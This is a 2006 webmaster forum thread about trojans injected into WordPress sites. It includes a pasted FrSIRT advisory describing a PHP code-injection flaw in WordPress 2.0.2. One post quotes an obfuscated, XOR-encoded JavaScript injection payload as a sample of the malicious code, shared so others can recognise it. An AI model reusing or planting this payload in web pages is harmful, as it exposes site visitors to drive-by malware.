WORDPRESS - trojan-virus

[SmokeyTheBear]

I have had alot of people contacting me recently about trojans and virii on their sites that show up mysteriously on all their pages..

The comman factor seems to be wordpress. I am not a wordpress user so i dont know whats up , but if you are running wordpress i suggest doing an update regardless and if you are having problems contact your host to have your server cleaned up..

p.s. just cause you got rid of it once doesnt mean its gone. Its likely hiding in the shadows waiting to reinstall itself..

p.s.s. i recently invented a very usefull tool for checking sites ..
http://tools.webspacemania.com/proxy/
What this is is a "double anonymous" browser that will surf to any domain using a random proxy that then forwards the html to my server through the proxy then redisplay's the results to you. ( its also usefull to determine if your having network troubles connecting to a site ).

Keep in mind it going through several proxies so it takes a bit of time , and sometime the proxies are dead so it will fail. Also keep in mind the images are redisplayed inlin in your browser , so while the page contents are completely anonymous , any images will be redisplayed inline through your browser so if you want to be ULTRA anonymous , turn off images in your browser first.

The script will disable any javascript on the target page so you dont have to worry about trojans and such when checking a site..

When you testa site the proxy port and county of the proxy will be displayed in the upper left hand corner of any page you check

[2HousePlague]

Thanks!

2hp

[SmokeyTheBear]

bump 4 wordpress peeps

[Scotty.T]

Giving this a try but I can't read the results page properly. The proxy info box covers part of the message. I can only see the last 5 letters of a word 'ently'

[baddog]

What is this trojan doing that people noticed a problem?

What version of WP was the common denominator?

[nancycash]

thanks for useful link and info. esp. for link - now it's in my "favorites"

[Violetta]

I had some trojans on my servers earlier today. Perhaps they came from a wordpress... Had to upgrade. Thanks for the info!

[Basic_man]

Thanks for the info, I'll take a closer look at this.

[Rebecca Love]

bump again for WP crew!

[ladida]

Its a voulnerability in wordpress actually that among other things, allows people to install trojan on your system.

[fetishblog]

Quote:

<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

This is what the malicious code usually looks like that he is talking about.

[OzMan]

hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?

[OzMan]

apparently jerzeemedia is familiar with the problem and solution

http://www.gofuckyourself.com/showth...oto=nextnewest

[SmokeyTheBear]

Quote:

Originally Posted by OzMan

hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?

havent seen anything but been contacted by nearly a dozen [people this week , that was the only common thing so far ( there are other script being hit though , like trade scripts )

[Corona]

It has to be more than just a wordpress problem.

I had something that looked like the example fetishblog posted and the only script used is phpadsnew.

Anyone know what it does?

[baddog]

I will ask again . . . what version of Wordpress is this happening on?

[nico-t]

yea we need more details

[JD]

Quote:

Originally Posted by baddog

I will ask again . . . what version of Wordpress is this happening on?

i'm wondering the same thing.

[dunefield]

bump....

[SmokeyTheBear]

someone mentioned it in another thread. im not familiar with the product because i dont use it .. ( im referring to the version number affected )

[baddog]

Quote:

Originally Posted by SmokeyTheBear

someone mentioned it in another thread. im not familiar with the product because i dont use it .. ( im referring to the version number affected )

I would be inclined to think it was a common plugin they were using rather that WP itself.

[poondaddy]

There was a security update for Wordpress released a month or so ago, 2.02

[SmokeyTheBear]

http://www.gofuckyourself.com/showthread.php?t=613700

[JD]

just checked all of my wp blogs and nothing found. whew

[SmokeyTheBear]

Advisory ID : FrSIRT/ADV-2006-1992
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-05-26

Technical Description

A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server.

Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses.

Affected Products

WordPress version 2.0.2 and prior

Solution

The FrSIRT is not aware of any official supplied patch for this issue.

[baddog]

okay, thanks

[AlienQ - BANNED FOR LIFE]

I was a victim of this piece of this shit.